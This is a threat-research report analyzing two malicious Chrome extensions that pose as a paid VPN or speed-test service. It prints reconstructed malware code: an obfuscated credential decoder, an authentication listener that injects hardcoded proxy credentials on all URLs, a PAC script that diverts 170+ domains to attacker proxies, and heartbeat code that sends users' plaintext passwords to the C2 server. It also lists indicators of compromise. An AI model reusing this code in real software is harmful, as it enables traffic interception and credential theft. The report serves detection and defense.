Socket's Threat Research Team identified two malicious Chrome extensions sharing the same name Phantom Shuttle (幻影穿梭), published by the same threat actor using the email theknewone.com@gmail[.]com, distributed since at least 2017. The extensions market themselves as "multi-location network speed testing plugins" for developers and foreign trade personnel. Users pay subscriptions ranging from ¥9.9 to ¥95.9 CNY ($1.40 to $13.50 USD) believing they're purchasing a legitimate VPN service, but both variants perform identical malicious operations. Behind the subscription facade, the extensions execute complete traffic interception through authentication credential injection, operate as man-in-the-middle proxies, and continuously exfiltrate user data to the threat actor's C2 server.

Both extensions also use the legitimate jQuery library v1.12.2 by prepending malicious code that automatically injects hardcoded proxy credentials (topfany / 963852wei) into every HTTP authentication challenge. Users unknowingly route all web traffic through threat actor controlled proxies while the extension maintains a 60-second heartbeat to its C2 server at phantomshuttle[.]space, which remains operational as of December 23, 2025.

The extensions have over 2,180 users so far and remain live at the moment of this publication. We've submitted takedown requests to Google's Chrome Web Store security team.

Socket's AI Scanner detecting malicious backdoor code in the Phantom Shuttle extensions

Deceptive Commercial Service Model#

The Chrome Web Store listing positions Phantom Shuttle as a convenient network tool for developers and foreign trade workers who need to test connectivity from multiple geographic locations.

"即装即用，设置简单，为开发、外贸人员提供的模拟多地点网速测试插件。"
Translation from Chinese: "Ready to use, simple setup, a simulated multi-location network speed testing plugin for developers and foreign trade personnel."

The marketing emphasizes legitimate features like smart proxy management, multi-node switching, real-time speed monitoring with automatic ping tests, and customizable domain lists. The description makes no mention of credential injection, traffic interception, data exfiltration, or the malicious JavaScript libraries embedded in the extension.

The extension presents a professional interface with user registration, login, and a complete payment system integrated with Alipay and WeChat Pay. This facade of legitimacy, combined with the narrow targeting of Chinese-speaking developers and trade workers, makes victims unlikely to suspect malicious intent.

Users choose from four VIP tiers: Basic (¥9.9/month), Recommended (¥26.9/quarter with 10% discount), Popular (¥50.9/6-months with 15% discount), and Premium (¥95.9/year with 20% discount). After payment, users receive VIP status and the extension auto-enables "smarty" proxy mode, which routes traffic from 170+ targeted domains through the C2 infrastructure. The payment integration and tiered pricing structure mirror legitimate commercial services, creating victim retention through financial commitment while generating revenue for the threat actor.

This approach differs from typical malware distribution. Users actively seek out the extension, pay for access, and receive functional proxy services that appear to work as advertised. The extension performs actual latency tests to proxy servers and displays connection status, reinforcing the illusion of a legitimate product. Most victims remain unaware that their traffic is being intercepted and credentials stolen.

Authentication Hijacking Mechanism#

The credential injection mechanism lives inside two malicious JavaScript libraries bundled with the extension. Both jquery-1.12.2.min.js and scripts.js contain identical malicious code prepended to legitimate library code.

Obfuscation Layer

The malware uses a custom character-index encoding scheme to hide hardcoded credentials in both assets/js/jquery-1.12.2.min.js and scripts.js:

var tjp = "abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ  ;/:'\"!@#$%^&*()1234567890-=+_\\][{}|<>?,./`~";

function jerry(str) {
    if ((!str) || str == "undefined") return false;
    var rt = "";
    var art = str.split("|");
    if ((!art) || art == "undefined") return false;
    art.forEach(function(e) {
        if (e && e !== "undefined") {
            rt += tjp[e];
        }
    });
    return rt;
}

// Encoded credentials
var P_x = "19|14|15|5|0|13|24|";         // topfany
var P_y = "78|75|72|77|74|71|22|4|8|";   // 963852wei
var xtin = jerry(P_x);
var ytin = jerry(P_y)

The encoding splits strings into pipe-separated indices that map to characters in the tjp alphabet. This obfuscates the credentials topfany / 963852wei from basic static analysis. The decoded credentials are stored in variables xtin and ytin, then used in the authentication listener.

Automatic Credential Injection

The libraries register a listener on chrome.webRequest.onAuthRequired that intercepts every HTTP authentication challenge across all websites:

chrome.webRequest.onAuthRequired.addListener(function(B, A) {
    A({
        authCredentials: {
            username: xtin,  // "topfany"
            password: ytin   // "963852wei"
        }
    })
}, {
    urls: ["<all_urls>"]
}, ["asyncBlocking"]);

When any website or service requests HTTP authentication (Basic Auth, Digest Auth, or proxy authentication), this listener fires before the browser displays a credential prompt. It immediately responds with the hardcoded proxy credentials, completely transparent to the user. The asyncBlocking mode ensures synchronous credential injection, preventing any user interaction.

This mechanism serves two purposes. First, it automatically authenticates to threat actor controlled proxy servers without requiring user credentials. Second, it could potentially authenticate to any HTTP-protected resource using these credentials, though the primary target is the proxy infrastructure itself.

Proxy Configuration and Traffic Interception#

After users authenticate and activate VIP status, the extension dynamically configures Chrome's proxy settings using a PAC (Proxy Auto-Configuration) script. The extension implements three proxy modes: "close" (disabled), "always" (route all traffic), and "smarty" (selective targeting).

Smart Proxy Mode

The "smarty" mode uses a hardcoded list of 170+ high-value domains that get routed through the threat actor’s proxy:

function ne() {
    chrome.storage.local.get(["autoProxyList", "position"], function(j) {
        let domains = typeof domainList === 'string' ? domainList.split(",") : domainList;
        let decodedProxy = U(proxyServer);

        let pacScript = `var FindProxyForURL = function(url, host){
            var D = "DIRECT";
            var p = '${decodedProxy}';

            // Exclude private IPs and localhost
            if (shExpMatch(host, '10.[0-9]+.[0-9]+.[0-9]+')) return D;
            if (shExpMatch(host, '192.168.[0-9]+.[0-9]+')) return D;
            if (shExpMatch(host, '127.[0-9]+.[0-9]+.[0-9]+')) return D;

            // Exclude C2 domain
            if (url.indexOf('phantomshuttle') >= 0) return D;

            // High-value targets
            if (url.match(/google/)) return p;
            if (url.match(/twitter/)) return p;
            if (url.match(/github/)) return p;

            // Domain whitelist matching
            ${domains.map(d => `
                if (shExpMatch(url, '*.${d}/*')) return p;
            `).join('\n')}

            return D;
        }`;

        chrome.proxy.settings.set({
            value: { mode: "pac_script", pacScript: { data: pacScript } },
            scope: "regular"
        });
    });
}

The target list includes developer tools (github.com, stackoverflow.com, docker.com, npm registries), cloud services (amazonaws.com, digitalocean.com, Azure), corporate platforms (cisco.com, ibm.com, vmware.com), social media (facebook.com, twitter.com, instagram.com), and adult content sites (pornhub.com, xvideos.es, 91porn.com). The inclusion of adult sites may be used for blackmail material and privacy leverage.

The PAC script excludes private IP ranges to maintain normal LAN connectivity and excludes the C2 domain itself to ensure control channel reliability. Google connectivity check endpoints are also excluded to avoid detection, as Chrome uses these to validate internet connectivity.

Once traffic routes through the proxy authenticated with topfany / 963852wei, the threat actor gains a man-in-the-middle position. All HTTP traffic (URLs, headers, POST data) passes through C2 infrastructure. HTTPS traffic remains encrypted in transit but could be intercepted if the threat actor deploys a malicious root certificate. The proxy position also enables response manipulation, malicious payload injection, and cookie theft from HTTP headers.

Data Collection and Exfiltration#

The extensions implements multiple data collection mechanisms that operate continuously while the extensions remains active.

Heartbeat System

The extension establishes a 60-second heartbeat to its C2 server at phantomshuttle[.]space:

chrome.alarms.create("heartbeat", {
    delayInMinutes: 1,
    periodInMinutes: 1
});

chrome.alarms.onAlarm.addListener(function(alarm) {
    if (alarm.name === "heartbeat") {
        chrome.storage.local.get(["email", "password", "level", "proxyMode"], function(stored) {
            if (stored.level === "1" && stored.proxyMode !== "close") {
                sendHeartbeat(stored);
            }
        });
    }
});

The heartbeat alarm fires every 1 minute but only transmits data to the server every 5 minutes (300,000 milliseconds). The VIP status check function Q() handles the actual data transmission:

function Q(type = "1") {
    chrome.storage.local.get(["email", "password"], function(stored) {
        chrome.storage.local.get(["positiond", "email", "noticetime2"], function(config) {
            let apiUrl = config.positiond ?? "";
            let email = config.email ?? "";

            if (apiUrl) {
                fetch(U(apiUrl), {  // U() decodes the API URL
                    method: "GET",
                    body: JSON.stringify({
                        type: type,
                        email: email,
                        password: stored.password,
                        version: "319"
                    })
                }).then(response => response.json())
                  .then(data => {
                      // Process server commands
                      if (data.type === "999") {
                          // Not logged in - disable proxy
                          setProxyMode("close");
                      }
                      if (data.type === "801") {
                          // VIP expired - disable proxy
                          setProxyMode("close");
                      }
                      if (data.type === "99") {
                          // Multiple logins detected - force logout
                          chrome.storage.local.set({email: "", token: ""});
                      }
                  });
            }
        });
    });
}

The heartbeat transmits user email, password in plaintext, and version number directly to the threat actor's server via GET request with JSON body. This occurs every 5 minutes for all active VIP users, providing continuous credential exfiltration and session monitoring.

VIP Status Monitoring and Remote Commands

The extension regularly checks VIP status and responds to server commands that facilitate data exfiltration:

• Type "999": User not logged in - disables proxy and shows notification
• Type "3": Valid login - updates VIP level and expiration date
• Type "88": Trial activation - enables proxy in "smarty" mode
• Type "801": VIP expired - disables proxy and prompts for renewal
• Type "99": Multiple concurrent logins detected - forces logout

Each API call to check VIP status sends the user's email and password in plaintext to the C2 server, even when just verifying account status. This design ensures continuous credential exfiltration under the guise of normal subscription validation.

Data Exfiltration Channels

The extension uses multiple channels to transmit collected data to the C2 server:

1. Configuration Download (Initial Contact)

fetch("https://phantomshuttle[.]space/index[.]php?g=user&m=register&a=do_query_server")
    .then(response => response.json())
    .then(data => {
        // Server responds with encoded proxy credentials, API endpoints, payment URLs
        const config = {
            positionx: data.positionx,      // Encoded proxy username
            positiony: data.positiony,      // Encoded proxy password
            positiona: data.positiona,      // Encoded registration API URL
            positionc: data.positionc,      // Additional config
            positiond: data.positiond,      // Encoded VIP status check URL
            positione: data.positione,      // Encoded alternate API URL
            positionf: data.positionf,      // Additional endpoints
            positiong: data.positiong,
            positionh: data.positionh,
            cfg_websiteurl_s: U(data.positiond),  // Decoded URLs stored for quick access
            cfg_websiteurl: U(data.positione)
        };
        chrome.storage.local.set(config);
    });

2. Heartbeat Transmission (Every 5 minutes)

chrome.storage.local.get([
    "email", "password", "token", "level",
    "proxyMode", "hearttimes"
], function(stored) {
    // Transmits to C2 via decoded positiond endpoint
    const payload = {
        type: "99",  // Heartbeat type
        email: stored.email,
        password: stored.password,
        version: "319"
    };
    
    fetch(decodedApiUrl, {
        method: "GET",
        body: JSON.stringify(payload)
    });
});

3. Proxy Traffic (Continuous MITM)

All traffic to the 170+ targeted domains routes through threat actor-controlled proxies authenticated with topfany / 963852wei. The proxy position enables:

• Direct credential capture from form submissions
• Session cookie theft from HTTP headers
• API token extraction from requests
• Credit card interception from payment forms
• POST data collection (passwords, personal information)

The combination of heartbeat exfiltration (credentials and metadata) plus proxy MITM (real-time traffic capture) provides comprehensive data theft capabilities operating continuously while the extension remains active.

Persistent Storage

User credentials, session tokens, and configuration data persist in Chrome's local storage:

// Location: chrome.storage.local (persistent across browser sessions) 
// The following snippet is an example of what the chrome.storage.local data would look like

{
    "email": "user@example.com",
    "password": "user_password",
    "token": "session_token",
    "level": "1",
    "expire": "2025-12-31",
    "position": "[encoded_proxy_url]",
    "cfg_websiteurl": "[decoded_api_url]",
    "nodePingTimes": {"server1": 123, "server2": 456},
    "failedDomains_[tabId]": ["blocked-domain.com"],
    "autoProxyList": ["google.com", "facebook.com", ...]
}

This data remains accessible to the extension across browser restarts. The storage of plaintext or weakly hashed passwords in chrome.storage.local provides the threat actor with credential access if they compromise the local storage database. The encoded proxy URLs use the same jerry() decoding function from the malicious libraries.

Infrastructure and Operational Context#

Our analysis confirmed the C2 server remains operational as of today. DNS resolution shows phantomshuttle[.]space pointing to IP address 47[.]244[.]125[.]55, hosted on Alibaba Cloud in Hong Kong. WHOIS records indicate domain registration on November 3, 2017, with expiration set for November 3, 2026. The 8+ year operational timeline demonstrates sustained criminal infrastructure rather than a short-term campaign.

The domain uses Cloudflare for CDN and DDoS protection, making takedown more difficult. Cloudflare's privacy protection obscures the true registrant identity. The server responds to HTTPS requests on port 443 with valid SSL certificates, presenting a professional appearance to users and security scanners.

API endpoint testing confirmed multiple active endpoints:

https://phantomshuttle[.]space/index[.]php?g=user&m=register&a=do_query_server
https://phantomshuttle[.]space/price[.]php
https://phantomshuttle[.]space/index[.]php?g=Pay&m=Index&a=payaction
https://phantomshuttle[.]space/index[.]php?g=wxpay&m=wxpay&a=wxpay_api

The unauthenticated response from the server configuration endpoint returns proxy credentials and payment URLs but does not include actual proxy server IP addresses. Proxy servers appear to be dynamically assigned after user authentication, retrieved from the /list.php endpoint or delivered through the user status API. This two-stage model prevents enumeration of proxy infrastructure without valid credentials.

Impact Assessment

For users accessing targeted domains while VIP mode is active, the extension captures:

• All passwords typed into login forms
• Credit card numbers and payment information
• Authentication cookies and session tokens
• Complete browsing history on proxied domains
• Form data including addresses and phone numbers
• API keys and access tokens from developer tools

The developer and foreign trade targeting creates high corporate risk. An employee using this extension on a personal device that also accesses corporate VPN creates a breach vector:

The 170-domain target list specifically includes cloud service consoles (AWS, Azure, GCP), version control systems (GitHub, GitLab), and development tools (Docker, npm registries). Developer credential theft enables supply chain attacks through compromised source repositories or malicious package injection.

The adult content site inclusion provides blackmail leverage. Browsing history combined with financial data and personal information creates extortion opportunities beyond simple credential sales.

Outlook and Recommendations#

Phantom Shuttle combines deceptive commercial service distribution with credential theft and traffic interception. The subscription model creates victim retention while generating revenue, and the professional infrastructure with payment integration presents a facade of legitimacy. Users believe they're purchasing a VPN service while unknowingly enabling complete traffic compromise.

The 8+ year operational timeline and active infrastructure indicate an established threat actor with sustained criminal operations. The Chinese language targeting, Alipay/WeChat Pay integration, and Alibaba Cloud hosting suggest China-based operation, though the threat actor could be anywhere given cloud infrastructure accessibility.

Similar patterns will likely appear in other commercial VPN and proxy extensions. Extensions that combine subscription models with extensive permissions, particularly webRequestAuthProvider, proxy, and management, should be treated as high-risk. Unexpected authentication injection, hardcoded credentials, or opaque backend requests indicate manipulation, particularly when the extension presents itself as a convenience tool with professional payment integration.

For Users

• Review permissions before installing any extension, especially VPN or proxy tools
• Avoid extensions requesting webRequestAuthProvider permission
• Check extension file sizes against legitimate library distributions
• Verify proxy configuration changes in Chrome settings
• Audit installed extensions monthly and remove unnecessary ones
• Never reuse credentials across personal and corporate systems

For Security Teams

• Deploy extension whitelisting and block dangerous permissions.
• Monitor for extensions with subscription payment systems combined with proxy permissions.
• Flag extensions hardcoding credentials or wallet addresses.
• Implement network monitoring for suspicious proxy authentication attempts.
• Check for trojaned libraries through file size and hash comparison.
• Deploy EDR with browser extension analysis capabilities.
• Watch for domains with long registration histories but minimal legitimate presence.

Socket's Chrome extension protection analyzes extension bundles for hidden credential injection, unexpected authentication flows, and obfuscated proxy logic, blocking malicious updates before they compromise user endpoints.

MITRE ATT&CK#

• T1176 - Browser Extensions
• T1557 - Adversary-in-the-Middle
• T1090.002 - Proxy: External Proxy
• T1539 - Steal Web Session Cookie
• T1056.003 - Input Capture: Web Portal Capture
• T1027 - Obfuscated Files or Information
• T1071.001 - Application Layer Protocol: Web Protocols
• T1573 - Encrypted Channel

Indicators of Compromise#

Chrome Extension

• Name: Phantom Shuttle (幻影穿梭)
• Extension ID: fbfldogmkadejddihifklefknmikncaj & ocpcmfmiidofonkbodpdhgddhlcmcofd
• Version: 3.1.9
• Registration Email: theknewone.com@gmail[.]com

Network Indicators

• C2 Domain: phantomshuttle[.]space
• C2 IP Address: 47[.]244[.]125[.]55
• Proxy Credentials: topfany / 963852wei